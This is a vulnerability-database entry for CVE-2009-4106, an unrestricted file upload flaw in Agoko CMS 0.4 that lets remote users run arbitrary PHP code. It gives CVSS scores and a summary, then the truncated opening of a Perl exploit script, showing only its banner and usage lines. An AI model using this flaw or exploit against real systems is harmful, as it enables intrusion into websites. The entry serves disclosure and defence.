7.5
CVSSv2

CVE-2009-4106

Published: 29/11/2009 Updated: 19/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Unrestricted file upload vulnerability in admintools/editpage-2.php in Agoko CMS 0.4 and previous versions allows remote malicious users to inject and execute arbitrary PHP code via the filename and text parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

ohloh agoko cms

Exploits

#!/usr/bin/perl print q~ -------------------------------------------------- Agoko CMS <= 04 remote commands execution exploit by staker mail: staker[at]hotmail[dot]it -------------------------------------------------- [*] Usage -> perl [xplpl] [host] [path] [*] Example -> perl agkpl localhost /Agoko ~; #>-----------&l ...